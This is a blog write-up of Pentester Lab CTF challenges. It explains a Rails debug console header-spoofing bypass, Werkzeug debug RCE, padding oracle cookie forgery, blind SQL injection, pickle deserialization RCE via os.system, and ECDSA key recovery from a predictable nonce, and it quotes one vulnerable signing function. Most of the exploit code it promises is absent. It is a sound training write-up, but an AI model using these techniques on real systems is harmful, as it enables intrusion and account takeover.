Pentester Lab is a great site. If you haven’t done any of the challenges I highly recommend that you head over and try it out.
The pro version of the site has various badge tracks and even sends you a certificate of completion. I received my certificate for the CTF badge the other day, and I figured I’d do a write up of the challenges for others that might be interested.
Spoiler Alert: The solutions are posted below. If you plan on doing the CTF badge, don’t cheat — it will take all the fun out of it :).
The first challenge is the exploitation of CVE-2015-3224. This CVE is a vulnerability in the Ruby on Rails debug console present in Rails versions 3.x and 4.x.
The debug console is only permitted when the connection is initiated from localhost. This is intended to provide a developer working locally to use an interactive Ruby shell to inspect variables, issue queries and other tasks to figure out why an exception occurred. This also grants code execution, which is generally not a problem since the service is running locally anyway.
The issue detailed by the CVE is a whitelisting bypass. If misconfigured, a remote user can spoof the source address when connecting to services that are designed to use a front-end load balancer by using the X-Forwarded-For or X-Real-IP headers. The bypass in this case is setting the X-Forwarded-For header to “0000::1”, which is a way to express the IPv6 loopback address on a host.
Werkzeug Debug Mode
Werkzeug debug mode is similar to the Rails debug console issue above, except that it includes no such whitelisting. The documentation has some pretty strong warnings about the dangers of exposing this functionality to the public Internet. In fact, this is apparently how Patreon got hacked in 2015.
The exploit code for this one is pretty simple:
A padding oracle is an API (local or remote) that an attacker can use to determine if the PKCS7 padding on CBC mode encrypted ciphertext is valid or not. This is interesting because of the Boolean algebraic relationship between the padding and the plaintext. For more information on this issue, read the Wikipedia article.
If you’re interested in understanding this crypto attack (and others) in depth, I highly recommend doing the Matasano Crypto challenges. You will be able to break real-world crypto after doing those challenges. I’ve actually used the padding oracle attack in a penetration test and the client was blown away.
The site for this exercise includes registration and login functionality. After registering and logging in, I noticed what appeared to be an encrypted session cookie. When I tampered with the cookie in Burp Suite, the page returned “Invalid Padding”. It’s also worth mentioning that when the cookie was URL and base64 decoded, the length was cleanly divisible by 8. This indicated that it was likely encrypted with a block-based cipher and the block size is probably 8 bytes.
For this exercise I decided to cheat a bit. Coding a padding oracle attack from scratch isn’t hard per se, but it’s not that much fun either. I decided to use a pre-built Python library, which is aptly named python-paddingoracle. It presents a nice clean API and you only have to write the logic to interface with the oracle and return a true/false response.
To exploit this issue, I ran the padding oracle attack twice. The first time, I decrypted the cookie value from a user I registered to learn the format. Then I created my own plaintext cookie for the admin user and used the padding oracle attack to encrypt it. That’s the beauty of a padding oracle attack: you can decrypt and encrypt values without knowing the key.
Exploit code is shown below.
This is an interesting exercise. It’s a website that checks whether a credit card number is compromised. Entering the value “4111111111111111” returns “Your CC has been compromised”. This number is a common test number used when doing QA on web-based shopping carts.
A little experimentation yielded an obvious SQL injection vulnerability, but it didn’t appear to be exploitable with SQLmap due to some server-side validation. Some quick Googling on the word Luhn indicates that the validation is a checksum algorithm called the Luhn algorithm. This algorithm is used to validate credit card and bank card numbers.
It took a bit of experimentation in Burp Suite to get this to work. The server-side validation only checks the digits against the Luhn algorithm, so it was possible to sneak in any other characters without influencing validation.
I chose to use Boolean blind SQL injection to exfiltrate the data. To do this, I created a conditional query that returned a the aforementioned “compromised” number when the condition was true. If the condition was false, the query would return nothing and the web site responded with a message indicating that the credit card was not in the database. If the query didn’t pass the server-side checks, the web site responded with “Invalid CC”. This allowed me to create a quick script and use the SUBSTR function on a subquery to test whether the next character was correctly guessed.
The script is shown below. It takes a bit of time to run. There are many ways it could be optimized but I wasn’t in a hurry anyway.
According to the description on Pentester Lab, this exercise is “SQL injection combined with remote code execution”. I immediately jumped to the conclusion that in must be union-based SQL injection, and the vulnerability is likely to be Python Pickle deserialization.
Since the table rows on the site were probably displayed exactly as they were stored in the database, I deemed it unnecessary to test how many fields are present or their data types. So, the SQL injection part appeared to be dead simple.
For the Python Pickle deserialization exploit, I created a custom Python object with a __reduce__ method. This method is used by the Pickle library to determine how to serialize the object. It should return a tuple, where the first variable in the tuple is a callable object, and the second is a tuple of parameters. See the Python documentation for more information.
This means that if the __reduce__ method returns os.system as the first value and a tuple with a single string entry (defining a shell command to run) as the second, the result will be arbitrary code execution. The final exploit is shown below.
Source code for this exercise is provided on the site. It also includes register and login functionality. Before I read the code, I decided to do a little reading up on ECDSA. Fortunately, Wikipedia has a good article on ECDSA.
I don’t know if it’s just me, but it seems like for a lot of hacking you just need to read the documentation and look for bolded text. Go skim the Wikipedia article for a second. Notice the bold text?
Select a cryptographically secure random integer k from [1,n−1].
Okay, thanks Wikipedia. After reading the source code and checking the ECDSA rubydoc, I found this gem:
def sign(str) digest = Digest::SHA256.digest(str) temp_key = str.size signature = ECDSA.sign($group, $private_key, digest, temp_key) end
It turns out that in this case, temp_key is the value of k, which is predictable. That doesn’t seem too hard to exploit.
You might have noticed that all my exploits for this CTF are in Python. In the past I’ve always used Ruby, but I’m giving Python a try. I feel compelled to explain why.
I love Ruby. I love how it feels like there’s less friction between me and the machine. Like I’m describing the solution to a problem in my native tongue. I like the clean OO model Ruby uses, and how everything is just an object — all the way down. I love the flexibility and metaprogramming that have provided us with ActiveRecord, Logstash and Puppet.
But here’s the thing: there are just no libraries, and a lot of the existing libraries are not well maintained. Python has libraries like scikit-learn. It has libraries for reading and write Word and Excel files, creating PDF files, and so much more. For the infosec/hacking crowd, it has great libraries and projects like Scapy, Responder.py, Impacket, Volatility, IDAPython, GDB plugins, Binary Ninja plugins, etc.
So now I’m using Python. I wouldn’t say that I’m “loving it”, but life isn’t perfect. So it goes.
As tempting as it was to write the solution in Ruby using the ECDSA gem, I decided to plod along and look for a Python ECDSA library. It didn’t take long to find one. I combed through the library looking for all the necessary functions and then read up on the attack. As it turns out, this is the same attack used to recover the Playstation 3 signing key.
My solution is shown below: